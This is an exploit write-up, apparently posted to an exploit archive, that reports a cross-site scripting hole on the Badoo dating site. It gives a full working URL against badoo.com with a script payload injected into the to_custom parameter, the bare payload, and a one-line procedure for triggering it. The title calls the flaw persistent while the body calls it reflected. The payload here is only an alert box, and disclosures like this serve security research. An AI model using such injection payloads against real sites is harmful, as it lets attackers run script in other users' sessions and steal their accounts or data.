%+
$.......#........4.........|)........0............\/\/       %+

                                              %+
                                                       %+

                                              %+++++++++++++++++++++++++++++
+++++++++++


# Exploit Title :Badoo persistent XSS vulnerability
# *Vendor*: www.badoo.com
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# Blog: http://shadowrootkit.wordpress.com/
# Google Dork:  © 2006–2011 Badoo Trading Limited

**********************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
                                           Badoo is the largest Social
Network for Meeting New People locally in the world. 121
million members are already connected and more than 100,000 new members join
every day. Badoo is not only
the largest, but also the fastest growing Social Network for Meeting New
People globally. * *
Badoo site is ranked 117 by ALEXA.

************************************************************
************************************************************
**********************************

Reflected XSS Vulnerability
********************************
{DEMO}:


http://badoo.com/dating/?location_id=0_0_0&location=worldwide&to_custom=%3Cscript%3Ealert%28%2Fr007k7%2F%29%3C%2Fscript%3E&gender[]=M&gender[]=F&age_f=18&age_t=80&is_extended=0&pos=custom



EXPLOIT: <script>alert(/r007k7/)</script>

Procedure: open the link given above. Observe  a pop-up saying /r007k7/


***************************************************************************************************************************************************************
sp3c14l Thanks to my sw337 bro s1d3 effects and my friends@!3.14--
***************************************************************************************************************************************************************